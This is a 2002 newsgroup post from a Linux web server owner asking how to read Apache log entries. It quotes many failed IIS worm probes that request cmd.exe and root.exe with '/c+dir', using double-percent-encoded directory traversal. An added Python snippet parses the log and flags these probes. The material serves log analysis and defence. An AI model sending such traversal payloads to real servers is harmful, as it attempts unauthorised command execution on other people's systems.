how to explain these logs?
From: chris (whoooever@yahoo.com) Date: 02/05/02
From: whoooever@yahoo.com (chris) Date: 4 Feb 2002 22:50:34 -0800
Hi,
I'm getting lots of this in my www log file: "GET
/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291 "-" "-"
Does this mean someone is attacking me as windows? (see below piece
of log file) I'm running RH72 with firewall.
Also, in some place of the log file, I see these 2 lines where the
URLs after "GET" have nothing to do with my URL/web server. How could
this happen? Is it someone is using my machine to access other web
site?
Can someone explain this a little bit to me, or point me to a place
for more details? Thanks a lot!
210.21.30.169 - - [04/Feb/2002:00:29:37 -0800] "GET
http://www.sina.com.cn/ HTTP/1.1" 200 692 "-" "Mozilla/4.0
(compatible; MSIE 4.01; Windows 95)"
216.35.116.20 - - [04/Feb/2002:04:55:48 -0800] "GET
/allhotel/Beijing_Hilton.htm HTTP/1.0" 404 294 "-" "Mozilla/5.0
(Slurp/cat; slurp@inktomi.com; http://www.inktomi.com/slurp.html)"
==== more logs ====
63.121.98.164 - - [03/Feb/2002:05:58:58 -0800] "GET
/scripts/root.exe?/c+dir HTTP/1.0" 404 283 "-" "-"
63.121.98.164 - - [03/Feb/2002:05:58:58 -0800] "GET
/MSADC/root.exe?/c+dir HTTP/1.0" 404 281 "-" "-"
63.121.98.164 - - [03/Feb/2002:05:58:58 -0800] "GET
/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291 "-" "-"
63.121.98.164 - - [03/Feb/2002:05:58:58 -0800] "GET
/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291 "-" "-"
63.121.98.164 - - [03/Feb/2002:05:58:59 -0800] "GET
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305 "-"
"-"
63.121.98.164 - - [03/Feb/2002:05:58:59 -0800] "GET
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 322 "-" "-"
63.121.98.164 - - [03/Feb/2002:05:58:59 -0800] "GET
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 322 "-" "-"
63.121.98.164 - - [03/Feb/2002:05:58:59 -0800] "GET
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 338 "-" "-"
35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 288 "-" "-"
63.121.98.164 - - [03/Feb/2002:05:59:01 -0800] "GET
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
"-" "-"
63.121.98.164 - - [03/Feb/2002:05:59:02 -0800] "GET
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305 "-"
"-"
216.35.116.91 - - [03/Feb/2002:11:27:19 -0800] "GET /robots.txt
HTTP/1.0" 404 277 "-" "Mozilla/3.0 (Slurp/si; slurp@inktomi.com;
http://www.inktomi.com/slurp.html)"
===end===
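
An added example, not part of the original post: a small Python classifier run over lines copied from the log above. It tags requests that name Windows executables, traversal sequences hidden by repeated percent-encoding, and requests that carry a full URL. The tag names and the `served` field are assumptions of this sketch.

```python
import re
from urllib.parse import unquote

# Apache combined log format: host ident user [time] "request" status bytes ...
LINE_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)(?: HTTP/[\d.]+)?" '
    r'(?P<status>\d{3}) \S+'
)
ABSOLUTE_URI_RE = re.compile(r'^[a-z][a-z0-9+.-]*://', re.I)
WIN_EXE_RE = re.compile(r'(?:cmd|root)\.exe', re.I)

# Lines copied from the post above, with the e-mail line wrapping removed.
SAMPLE_LOG = [
    '210.21.30.169 - - [04/Feb/2002:00:29:37 -0800] "GET http://www.sina.com.cn/ HTTP/1.1" 200 692 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows 95)"',
    '63.121.98.164 - - [03/Feb/2002:05:58:58 -0800] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291 "-" "-"',
    '63.121.98.164 - - [03/Feb/2002:05:58:59 -0800] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305 "-" "-"',
    '63.121.98.164 - - [03/Feb/2002:05:59:01 -0800] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305 "-" "-"',
    '216.35.116.91 - - [03/Feb/2002:11:27:19 -0800] "GET /robots.txt HTTP/1.0" 404 277 "-" "Mozilla/3.0 (Slurp/si; slurp@inktomi.com; http://www.inktomi.com/slurp.html)"',
]

def full_decode(text, max_rounds=3):
    """Percent-decode until stable, so %255c and %25%35%63 both become a backslash."""
    for _ in range(max_rounds):
        decoded = unquote(text, errors="replace")
        if decoded == text:
            break
        text = decoded
    return text

def classify(line):
    """Return host, status and tags for one log line, or None if it does not parse."""
    m = LINE_RE.match(line)
    if m is None:
        return None
    target, decoded = m["target"], full_decode(m["target"])
    tags = []
    if ABSOLUTE_URI_RE.match(target):
        tags.append("proxy-style-request")   # full URL in the request line
    if WIN_EXE_RE.search(decoded):
        tags.append("windows-exe-probe")     # asks for cmd.exe / root.exe
    if decoded != target and re.search(r'\.\.[\\/]', decoded):
        tags.append("encoded-traversal")     # ../ or ..\ hidden by percent-encoding
    status = int(m["status"])
    return {"host": m["host"], "status": status, "served": 200 <= status < 300, "tags": tags}

def flagged(lines):
    """Keep only parsed lines that carry at least one tag."""
    return [r for r in map(classify, lines) if r and r["tags"]]
```

A tagged line with `served` false (the 404s here) means the server had nothing at that path. A tagged line with `served` true, such as the full-URL request, is the one to check against the server's proxy configuration.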